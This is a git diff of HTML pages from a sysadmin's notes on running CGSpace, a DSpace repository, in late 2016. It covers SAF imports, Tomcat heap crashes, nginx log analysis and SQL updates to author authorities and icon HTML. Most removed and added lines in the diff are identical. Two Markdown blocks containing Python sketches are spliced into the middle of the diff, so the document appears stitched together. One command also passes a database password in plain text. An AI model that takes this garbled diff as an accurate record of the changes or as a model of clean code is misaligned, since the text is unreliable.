    @@ -251,7 +251,7 @@ TLSv1/EDH-RSA-DES-CBC3-SHA
  • If I unzip the original zip from CIAT on Windows, re-zip it with 7zip on Windows, and then unzip it on Linux directly, the file names seem to be proper UTF-8
  • We should definitely clean filenames so they don’t use characters that are tricky to process in CSV and shell scripts, like: ,, ', and "
  • -
    value.replace("'","").replace(",","").replace('"','')
    +
    value.replace("'","").replace(",","").replace('"','')
     
    • I need to write a Python script to match that for renaming files in the file system
    • When importing SAF bundles it seems you can specify the target collection on the command line using -c 10568/4003 or in the collections file inside each item in the bundle
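
For the file-system side of the filename cleanup mentioned above, something like the following might work. It is a rough sketch, not the script that was eventually written: `clean_name` mirrors the OpenRefine expression by deleting commas, single quotes, and double quotes, while `rename_cleaned` and its `dry_run` flag are hypothetical names chosen for illustration.

```python
from pathlib import Path

# The three characters removed by the OpenRefine expression: ' , "
_STRIP = str.maketrans('', '', ",'\"")


def clean_name(name: str) -> str:
    """Delete commas and quotes from a file name, leaving everything else untouched."""
    return name.translate(_STRIP)


def rename_cleaned(directory, dry_run=True):
    """Return (old, new) name pairs for files needing cleanup; rename them unless dry_run."""
    changes = []
    for path in sorted(Path(directory).iterdir()):
        if not path.is_file():
            continue
        new_name = clean_name(path.name)
        # Skip names that are already clean or that would become empty.
        if not new_name or new_name == path.name:
            continue
        target = path.with_name(new_name)
        if target.exists():
            raise FileExistsError(f'{target} already exists, refusing to overwrite')
        changes.append((path.name, new_name))
        if not dry_run:
            path.rename(target)
    return changes
```

Running it once with `dry_run=True` and checking the returned pairs against the cleaned names in the CSV seems safer than renaming straight away.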
    • @@ -264,7 +264,7 @@ TLSv1/EDH-RSA-DES-CBC3-SHA
    • Import CIAT Gender Network records to CGSpace, first creating the SAF bundles as my user, then importing as the tomcat7 user, and deleting the bundle, for each collection’s items:
    $ ./safbuilder.sh -c /home/aorth/ciat-gender-2016-09-06/66601.csv
    -$ JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx512m" /home/cgspace.cgiar.org/bin/dspace import -a -e aorth@mjanja.ch -c 10568/66601 -s /home/aorth/ciat-gender-2016-09-06/SimpleArchiveFormat -m 66601.map
    +$ JAVA_OPTS="-Dfile.encoding=UTF-8 -Xmx512m" /home/cgspace.cgiar.org/bin/dspace import -a -e aorth@mjanja.ch -c 10568/66601 -s /home/aorth/ciat-gender-2016-09-06/SimpleArchiveFormat -m 66601.map
     $ rm -rf ~/ciat-gender-2016-09-06/SimpleArchiveFormat/
     

    2016-09-07

      @@ -299,13 +299,13 @@ org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool error
    • I restarted Tomcat and it was ok again
    • CGSpace crashed a few hours later, errors from catalina.out:
    -
    Exception in thread "http-bio-127.0.0.1-8081-exec-25" java.lang.OutOfMemoryError: Java heap space
    +
    Exception in thread "http-bio-127.0.0.1-8081-exec-25" java.lang.OutOfMemoryError: Java heap space
             at java.lang.StringCoding.decode(StringCoding.java:215)
     
    • We haven’t seen that in quite a while…
    • Indeed, in a month of logs it only occurs 15 times:
    -
    # grep -rsI "OutOfMemoryError" /var/log/tomcat7/catalina.* | wc -l
    +
    # grep -rsI "OutOfMemoryError" /var/log/tomcat7/catalina.* | wc -l
     15
     
    • I also see a bunch of errors from dspace.log:
    • @@ -315,11 +315,11 @@ org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool error
    • Looking at REST requests, it seems there is one IP hitting us nonstop:
    -
    # awk '{print $1}' /var/log/nginx/rest.log  | sort -n | uniq -c | sort -h | tail -n 3
    +
    # awk '{print $1}' /var/log/nginx/rest.log  | sort -n | uniq -c | sort -h | tail -n 3
         820 50.87.54.15
       12872 70.32.99.142
       25744 70.32.83.92
    -# awk '{print $1}' /var/log/nginx/rest.log.1  | sort -n | uniq -c | sort -h | tail -n 3
    +# awk '{print $1}' /var/log/nginx/rest.log.1  | sort -n | uniq -c | sort -h | tail -n 3
        7966 181.118.144.29
       54706 70.32.99.142
      109412 70.32.83.92
    @@ -333,7 +333,7 @@ org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool error
     
    • And more heap space errors:
    -
    # grep -rsI "OutOfMemoryError" /var/log/tomcat7/catalina.* | wc -l
    +
    # grep -rsI "OutOfMemoryError" /var/log/tomcat7/catalina.* | wc -l
     19
     
    • There have been no more REST requests since the last crash, so maybe other things are causing this.
    • @@ -349,7 +349,7 @@ org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool error
    • From the activity control panel I can see 58 unique IPs hitting the site concurrently, which has GOT to hurt our stability
    • A list of all 2000 unique IPs from CGSpace logs today:
    -
    # grep ip_addr= /home/cgspace.cgiar.org/log/dspace.log.2016-09-11 | awk -F: '{print $5}' | sort -n | uniq -c | sort -h | tail -n 100
    +
    # grep ip_addr= /home/cgspace.cgiar.org/log/dspace.log.2016-09-11 | awk -F: '{print $5}' | sort -n | uniq -c | sort -h | tail -n 100
     
    • Looking at the top 20 IPs or so, most are Yahoo, MSN, Google, Baidu, TurnitIn (iParadigm), etc… do we have any real users?
    • Generate a list of all author affiliations for Peter Ballantyne to go through, make corrections, and create a lookup list from:
    • @@ -363,7 +363,7 @@ Wed Sep 14 09:47:28 UTC 2016 | Updating : 6/6 docs. Commit Commit done dn:CN=Haman\, Magdalena (CIAT-CCAFS),OU=Standard,OU=Users,OU=HQ,OU=CIATHUB,dc=cgiarad,dc=org -Exception in thread "http-bio-127.0.0.1-8081-exec-193" java.lang.OutOfMemoryError: Java heap space +Exception in thread "http-bio-127.0.0.1-8081-exec-193" java.lang.OutOfMemoryError: Java heap space
    • And after that I see a bunch of “pool error Timeout waiting for idle object”
    • Later, near the time of the next crash I see:
    • @@ -376,7 +376,7 @@ Commit done Sep 14, 2016 11:32:22 AM com.sun.jersey.server.wadl.generators.WadlGeneratorJAXBGrammarGenerator buildModelAndSchemas SEVERE: Failed to generate the schema for the JAX-B elements com.sun.xml.bind.v2.runtime.IllegalAnnotationsException: 2 counts of IllegalAnnotationExceptions -java.util.Map is an interface, and JAXB can't handle interfaces. +java.util.Map is an interface, and JAXB can't handle interfaces. this problem is related to the following location: at java.util.Map at public java.util.Map com.atmire.dspace.rest.common.Statlet.getRender() @@ -389,7 +389,7 @@ java.util.Map does not have a no-arg default constructor.
    • Then 20 minutes later another outOfMemoryError:
    -
    Exception in thread "http-bio-127.0.0.1-8081-exec-25" java.lang.OutOfMemoryError: Java heap space
    +
    Exception in thread "http-bio-127.0.0.1-8081-exec-25" java.lang.OutOfMemoryError: Java heap space
             at java.lang.StringCoding.decode(StringCoding.java:215)
     
    • Perhaps these particular issues are memory issues; the munin graphs definitely show some weird purging/allocating behavior starting this week
    • @@ -402,7 +402,7 @@ java.util.Map does not have a no-arg default constructor.
    • Oh great, the configuration on the actual server is different than in configuration management!
    • Seems we added a bunch of settings to the /etc/default/tomcat7 in December, 2015 and never updated our ansible repository:
    -
    JAVA_OPTS="-Djava.awt.headless=true -Xms3584m -Xmx3584m -XX:MaxPermSize=256m -XX:+UseConcMarkSweepGC -Dfile.encoding=UTF-8 -XX:-UseGCOverheadLimit -XX:MaxGCPauseMillis=250 -XX:GCTimeRatio=9 -XX:+PerfDisableSharedMem -XX:+ParallelRefProcEnabled -XX:G1HeapRegionSize=8m -XX:InitiatingHeapOccupancyPercent=75 -XX:+UseLargePages -XX:+AggressiveOpts"
    +
    JAVA_OPTS="-Djava.awt.headless=true -Xms3584m -Xmx3584m -XX:MaxPermSize=256m -XX:+UseConcMarkSweepGC -Dfile.encoding=UTF-8 -XX:-UseGCOverheadLimit -XX:MaxGCPauseMillis=250 -XX:GCTimeRatio=9 -XX:+PerfDisableSharedMem -XX:+ParallelRefProcEnabled -XX:G1HeapRegionSize=8m -XX:InitiatingHeapOccupancyPercent=75 -XX:+UseLargePages -XX:+AggressiveOpts"
     
    • So I’m going to bump the heap +512m and remove all the other experimental shit (and update ansible!)
    • Increased JVM heap to 4096m on CGSpace (linode01)
    • @@ -423,14 +423,14 @@ Thu Sep 15 18:45:26 UTC 2016 | Updating : 200/218 docs. Thu Sep 15 18:45:27 UTC 2016 | Updating : 218/218 docs. Commit Commit done -Exception in thread "http-bio-127.0.0.1-8081-exec-247" java.lang.OutOfMemoryError: Java heap space -Exception in thread "http-bio-127.0.0.1-8081-exec-241" java.lang.OutOfMemoryError: Java heap space -Exception in thread "http-bio-127.0.0.1-8081-exec-243" java.lang.OutOfMemoryError: Java heap space -Exception in thread "http-bio-127.0.0.1-8081-exec-258" java.lang.OutOfMemoryError: Java heap space -Exception in thread "http-bio-127.0.0.1-8081-exec-268" java.lang.OutOfMemoryError: Java heap space -Exception in thread "http-bio-127.0.0.1-8081-exec-263" java.lang.OutOfMemoryError: Java heap space -Exception in thread "http-bio-127.0.0.1-8081-exec-280" java.lang.OutOfMemoryError: Java heap space -Exception in thread "Thread-54216" org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Exception writing document id 7feaa95d-8e1f-4f45-80bb +Exception in thread "http-bio-127.0.0.1-8081-exec-247" java.lang.OutOfMemoryError: Java heap space +Exception in thread "http-bio-127.0.0.1-8081-exec-241" java.lang.OutOfMemoryError: Java heap space +Exception in thread "http-bio-127.0.0.1-8081-exec-243" java.lang.OutOfMemoryError: Java heap space +Exception in thread "http-bio-127.0.0.1-8081-exec-258" java.lang.OutOfMemoryError: Java heap space +Exception in thread "http-bio-127.0.0.1-8081-exec-268" java.lang.OutOfMemoryError: Java heap space +Exception in thread "http-bio-127.0.0.1-8081-exec-263" java.lang.OutOfMemoryError: Java heap space +Exception in thread "http-bio-127.0.0.1-8081-exec-280" java.lang.OutOfMemoryError: Java heap space +Exception in thread "Thread-54216" org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Exception writing document id 7feaa95d-8e1f-4f45-80bb -e14ef82ee224 to the index; possible analysis error. 
at org.apache.solr.client.solrj.impl.HttpSolrServer.executeMethod(HttpSolrServer.java:552) at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:210) @@ -443,7 +443,7 @@ Exception in thread "Thread-54216" org.apache.solr.client.solrj.impl.H
    • I bumped the heap space from 4096m to 5120m to see if this is really about heap space or not.
    • Looking into some of these errors that I’ve seen this week but haven’t noticed before:
    -
    # zcat -f -- /var/log/tomcat7/catalina.* | grep -c 'Failed to generate the schema for the JAX-B elements'
    +
    # zcat -f -- /var/log/tomcat7/catalina.* | grep -c 'Failed to generate the schema for the JAX-B elements'
     113
     
    • I’ve sent a message to Atmire about the Solr error to see if it’s related to their batch update module
    • @@ -474,7 +474,7 @@ $ ./delete-metadata-values.py -f cg.contributor.affiliation -i affiliations_pb-2
    • Turns out the Solr search logic switched from OR to AND in DSpace 6.0 and the change is easy to backport: https://jira.duraspace.org/browse/DS-2809
    • We just need to set this in dspace/solr/search/conf/schema.xml:
    -
    <solrQueryParser defaultOperator="AND"/>
    +
    <solrQueryParser defaultOperator="AND"/>
     
    • It actually works really well, and searches return far fewer hits now (before, after):
    @@ -533,12 +533,12 @@ OCSP Response Data:
  • Discuss fixing some ORCIDs for CCAFS author Sonja Vermeulen with Magdalena Haman
  • This author has a few variations:
  • -
    dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like 'Vermeu
    -len, S%';
    +
    dspacetest=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value like 'Vermeu
    +len, S%';
     
    • And it looks like fe4b719f-6cc4-4d65-8504-7a83130b9f83 is the authority with the correct ORCID linked
    -
    dspacetest=# update metadatavalue set authority='fe4b719f-6cc4-4d65-8504-7a83130b9f83w', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Vermeulen, S%';
    +
    dspacetest=# update metadatavalue set authority='fe4b719f-6cc4-4d65-8504-7a83130b9f83w', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Vermeulen, S%';
     UPDATE 101
     
    • Hmm, now her name is missing from the authors facet and only shows the authority ID
    • @@ -547,7 +547,7 @@ UPDATE 101
    • On a clean snapshot of the database I see the correct authority should be f01f7b7b-be3f-4df7-a61d-b73c067de88d, not fe4b719f-6cc4-4d65-8504-7a83130b9f83
    • Updating her authorities again and reindexing:
    -
    dspacetest=# update metadatavalue set authority='f01f7b7b-be3f-4df7-a61d-b73c067de88d', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Vermeulen, S%';
    +
    dspacetest=# update metadatavalue set authority='f01f7b7b-be3f-4df7-a61d-b73c067de88d', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Vermeulen, S%';
     UPDATE 101
     
    • Use GitHub icon from Font Awesome instead of a PNG to save one extra network request
    • @@ -564,8 +564,8 @@ UPDATE 101
    • Minor fix to a string in Atmire’s CUA module (#280)
    • This seems to be what I’ll need to do for Sonja Vermeulen (but with 2b4166b7-6e4d-4f66-9d8b-ddfbec9a6ae0 instead on the live site):
    -
    dspacetest=# update metadatavalue set authority='09e4da69-33a3-45ca-b110-7d3f82d2d6d2', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Vermeulen, S%';
    -dspacetest=# update metadatavalue set authority='09e4da69-33a3-45ca-b110-7d3f82d2d6d2', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Vermeulen SJ%';
    +
    dspacetest=# update metadatavalue set authority='09e4da69-33a3-45ca-b110-7d3f82d2d6d2', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Vermeulen, S%';
    +dspacetest=# update metadatavalue set authority='09e4da69-33a3-45ca-b110-7d3f82d2d6d2', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Vermeulen SJ%';
     
    • And then update Discovery and Authority indexes
    • Minor fix for “Subject” string in Discovery search and Atmire modules (#281)
    • @@ -580,7 +580,7 @@ $ ./delete-metadata-values.py -i ilrisubjects-delete-13.csv -f cg.subject.ilri -
    • DSpace Test (linode02) became unresponsive for some reason, I had to hard reboot it from the Linode console
    • People on DSpace mailing list gave me a query to get authors from certain collections:
    -
    dspacetest=# select distinct text_value from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10568/5472', '10568/5473')));
    +
    dspacetest=# select distinct text_value from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10568/5472', '10568/5473')));
     

    2016-09-30

    • Deny access to REST API’s find-by-metadata-field endpoint to protect against an upstream security issue (DS-3250)
    • diff --git a/docs/2016-10/index.html b/docs/2016-10/index.html index 365520619..fa3edb15e 100644 --- a/docs/2016-10/index.html +++ b/docs/2016-10/index.html @@ -42,7 +42,7 @@ I exported a random item’s metadata as CSV, deleted all columns except id 0000-0002-6115-0956||0000-0002-3812-8793||0000-0001-7462-405X "/> - + @@ -168,7 +168,7 @@ $ ./delete-metadata-values.py -i authors-delete-3.csv -f dc.contributor.author -
    • CGSpace crashed a few times today
    • Generate list of unique authors in CCAFS collections:
    -
    dspacetest=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10568/32729', '10568/5472', '10568/5473', '10568/10288', '10568/70974', '10568/3547', '10568/3549', '10568/3531','10568/16890','10568/5470','10568/3546', '10568/36024', '10568/66581', '10568/21789', '10568/5469', '10568/5468', '10568/3548', '10568/71053', '10568/25167'))) group by text_value order by count desc) to /tmp/ccafs-authors.csv with csv;
    +
    dspacetest=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10568/32729', '10568/5472', '10568/5473', '10568/10288', '10568/70974', '10568/3547', '10568/3549', '10568/3531','10568/16890','10568/5470','10568/3546', '10568/36024', '10568/66581', '10568/21789', '10568/5469', '10568/5468', '10568/3548', '10568/71053', '10568/25167'))) group by text_value order by count desc) to /tmp/ccafs-authors.csv with csv;
     

    2016-10-05

    • Work on more infrastructure cleanups for Ansible DSpace role
    • @@ -190,7 +190,7 @@ $ ./delete-metadata-values.py -i authors-delete-3.csv -f dc.contributor.author -
    • Re-deploy CGSpace with latest changes from late September and early October
    • Run fixes for ILRI subjects and delete blank metadata values:
    -
    dspace=# delete from metadatavalue where resource_type_id=2 and text_value='';
    +
    dspace=# delete from metadatavalue where resource_type_id=2 and text_value='';
     DELETE 11
     
    • Run all system updates and reboot CGSpace
    • @@ -211,7 +211,7 @@ DELETE 11
      • A bit more cleanup on the CCAFS authors, and run the corrections on DSpace Test:
      -
      $ ./fix-metadata-values.py -i ccafs-authors-oct-16.csv -f dc.contributor.author -t 'correct name' -m 3 -d dspace -u dspace -p fuuu
      +
      $ ./fix-metadata-values.py -i ccafs-authors-oct-16.csv -f dc.contributor.author -t 'correct name' -m 3 -d dspace -u dspace -p fuuu
       
      • One observation is that there are still some old versions of names in the author lookup because authors appear in other communities (as we only corrected authors from CCAFS for this round)
      @@ -253,35 +253,35 @@ $ git rebase -i dspace-5.5
    • Start testing some things for DSpace 5.5, like command line metadata import, PDF media filter, and Atmire CUA
    • Start looking at batch fixing of “old” ILRI website links without www or https, for example:
    -
    dspace=# select * from metadatavalue where resource_type_id=2 and text_value like 'http://ilri.org%';
    +
    dspace=# select * from metadatavalue where resource_type_id=2 and text_value like 'http://ilri.org%';
     
    • Also CCAFS has HTTPS and their links should use it where possible:
    -
    dspace=# select * from metadatavalue where resource_type_id=2 and text_value like 'http://ccafs.cgiar.org%';
    +
    dspace=# select * from metadatavalue where resource_type_id=2 and text_value like 'http://ccafs.cgiar.org%';
     
    • And this will find community and collection HTML text that is using the old style PNG/JPG icons for RSS and email (we should be using Font Awesome icons instead):
    -
    dspace=# select text_value from metadatavalue where resource_type_id in (3,4) and text_value like '%Iconrss2.png%';
    +
    dspace=# select text_value from metadatavalue where resource_type_id in (3,4) and text_value like '%Iconrss2.png%';
     
    • Turns out there are shit tons of varieties of this, like with http, https, www, separate </img> tags, alignments, etc
    • Had to find all variations and replace them individually:
    -
    dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="https://www.ilri.org/images/Iconrss2.png"/>','<span class="fa fa-rss fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="https://www.ilri.org/images/Iconrss2.png"/>%';
    -dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="https://www.ilri.org/images/email.jpg"/>', '<span class="fa fa-at fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="https://www.ilri.org/images/email.jpg"/>%';
    -dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="http://www.ilri.org/images/Iconrss2.png"/>', '<span class="fa fa-rss fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="http://www.ilri.org/images/Iconrss2.png"/>%';
    -dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="http://www.ilri.org/images/email.jpg"/>', '<span class="fa fa-at fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="http://www.ilri.org/images/email.jpg"/>%';
    -dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="http://www.ilri.org/images/Iconrss2.png"></img>', '<span class="fa fa-rss fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="http://www.ilri.org/images/Iconrss2.png"></img>%';
    -dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="http://www.ilri.org/images/email.jpg"></img>', '<span class="fa fa-at fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="http://www.ilri.org/images/email.jpg"></img>%';
    -dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="https://ilri.org/images/Iconrss2.png"></img>', '<span class="fa fa-rss fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="https://ilri.org/images/Iconrss2.png"></img>%';
    -dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="https://ilri.org/images/email.jpg"></img>', '<span class="fa fa-at fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="https://ilri.org/images/email.jpg"></img>%';
    -dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="https://www.ilri.org/images/Iconrss2.png"></img>', '<span class="fa fa-rss fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="https://www.ilri.org/images/Iconrss2.png"></img>%';
    -dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="https://www.ilri.org/images/email.jpg"></img>', '<span class="fa fa-at fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="https://www.ilri.org/images/email.jpg"></img>%';
    -dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="https://ilri.org/images/Iconrss2.png"/>', '<span class="fa fa-rss fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="https://ilri.org/images/Iconrss2.png"/>%';
    -dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="https://ilri.org/images/email.jpg"/>', '<span class="fa fa-at fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="https://ilri.org/images/email.jpg"/>%';
    -dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img valign="center" align="left" src="https://www.ilri.org/images/Iconrss2.png"/>', '<span class="fa fa-rss fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img valign="center" align="left" src="https://www.ilri.org/images/Iconrss2.png"/>%';
    -dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img valign="center" align="left" src="https://www.ilri.org/images/email.jpg"/>', '<span class="fa fa-at fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img valign="center" align="left" src="https://www.ilri.org/images/email.jpg"/>%';
    -dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img valign="center" align="left" src="http://www.ilri.org/images/Iconrss2.png"/>', '<span class="fa fa-rss fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img valign="center" align="left" src="http://www.ilri.org/images/Iconrss2.png"/>%';
    -dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img valign="center" align="left" src="http://www.ilri.org/images/email.jpg"/>', '<span class="fa fa-at fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img valign="center" align="left" src="http://www.ilri.org/images/email.jpg"/>%';
    +
    dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="https://www.ilri.org/images/Iconrss2.png"/>','<span class="fa fa-rss fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="https://www.ilri.org/images/Iconrss2.png"/>%';
    +dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="https://www.ilri.org/images/email.jpg"/>', '<span class="fa fa-at fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="https://www.ilri.org/images/email.jpg"/>%';
    +dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="http://www.ilri.org/images/Iconrss2.png"/>', '<span class="fa fa-rss fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="http://www.ilri.org/images/Iconrss2.png"/>%';
    +dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="http://www.ilri.org/images/email.jpg"/>', '<span class="fa fa-at fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="http://www.ilri.org/images/email.jpg"/>%';
    +dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="http://www.ilri.org/images/Iconrss2.png"></img>', '<span class="fa fa-rss fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="http://www.ilri.org/images/Iconrss2.png"></img>%';
    +dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="http://www.ilri.org/images/email.jpg"></img>', '<span class="fa fa-at fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="http://www.ilri.org/images/email.jpg"></img>%';
    +dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="https://ilri.org/images/Iconrss2.png"></img>', '<span class="fa fa-rss fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="https://ilri.org/images/Iconrss2.png"></img>%';
    +dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="https://ilri.org/images/email.jpg"></img>', '<span class="fa fa-at fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="https://ilri.org/images/email.jpg"></img>%';
    +dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="https://www.ilri.org/images/Iconrss2.png"></img>', '<span class="fa fa-rss fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="https://www.ilri.org/images/Iconrss2.png"></img>%';
    +dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="https://www.ilri.org/images/email.jpg"></img>', '<span class="fa fa-at fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="https://www.ilri.org/images/email.jpg"></img>%';
    +dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="https://ilri.org/images/Iconrss2.png"/>', '<span class="fa fa-rss fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="https://ilri.org/images/Iconrss2.png"/>%';
    +dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img align="left" src="https://ilri.org/images/email.jpg"/>', '<span class="fa fa-at fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img align="left" src="https://ilri.org/images/email.jpg"/>%';
    +dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img valign="center" align="left" src="https://www.ilri.org/images/Iconrss2.png"/>', '<span class="fa fa-rss fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img valign="center" align="left" src="https://www.ilri.org/images/Iconrss2.png"/>%';
    +dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img valign="center" align="left" src="https://www.ilri.org/images/email.jpg"/>', '<span class="fa fa-at fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img valign="center" align="left" src="https://www.ilri.org/images/email.jpg"/>%';
    +dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img valign="center" align="left" src="http://www.ilri.org/images/Iconrss2.png"/>', '<span class="fa fa-rss fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img valign="center" align="left" src="http://www.ilri.org/images/Iconrss2.png"/>%';
    +dspace=# update metadatavalue set text_value = regexp_replace(text_value, '<img valign="center" align="left" src="http://www.ilri.org/images/email.jpg"/>', '<span class="fa fa-at fa-2x" aria-hidden="true"></span>') where resource_type_id in (3,4) and text_value like '%<img valign="center" align="left" src="http://www.ilri.org/images/email.jpg"/>%';
     
    • Getting rid of these reduces the number of network requests each client makes on community/collection pages, and makes use of Font Awesome icons (which they are already loading anyways!)
    • And now that I start looking, I want to fix a bunch of links to popular sites that should be using HTTPS, like Twitter, Facebook, Google, Feed Burner, DOI, etc
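The per-variation updates above could probably be collapsed into one pattern. This is only a minimal sketch in Python, not what was run on the server: it assumes the only variations are the ones listed (http or https, with or without www, an optional `valign="center"` attribute, and either a `/>` or `></img>` ending). The names `IMG_RE`, `ICONS`, and `replace_icons` are made up for illustration.

```python
import re

# Map each old image file to the Font Awesome class that replaces it
# (taken from the replacement strings used in the SQL above).
ICONS = {"Iconrss2.png": "fa-rss", "email.jpg": "fa-at"}

# Hypothetical pattern covering the variations seen in the SQL statements:
# optional valign attribute, http/https, optional www, and two closing styles.
IMG_RE = re.compile(
    r'<img\s+(?:valign="center"\s+)?align="left"\s+'
    r'src="https?://(?:www\.)?ilri\.org/images/(Iconrss2\.png|email\.jpg)"\s*'
    r'(?:/>|></img>)'
)


def replace_icons(html: str) -> str:
    """Replace old RSS/email image tags with Font Awesome spans."""

    def _sub(match: re.Match) -> str:
        icon_class = ICONS[match.group(1)]
        return f'<span class="fa {icon_class} fa-2x" aria-hidden="true"></span>'

    return IMG_RE.sub(_sub, html)


if __name__ == "__main__":
    sample = '<img align="left" src="https://ilri.org/images/email.jpg"></img>'
    print(replace_icons(sample))
```

Any variation not covered by the pattern is left untouched, so it would still be worth searching for leftover `Iconrss2.png` and `email.jpg` references afterwards.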
    • @@ -321,9 +321,9 @@ UPDATE 0
      • Fix some messed up authors on CGSpace:
      -
      dspace=# update metadatavalue set authority='799da1d8-22f3-43f5-8233-3d2ef5ebf8a8', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Charleston, B.%';
      +
      dspace=# update metadatavalue set authority='799da1d8-22f3-43f5-8233-3d2ef5ebf8a8', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Charleston, B.%';
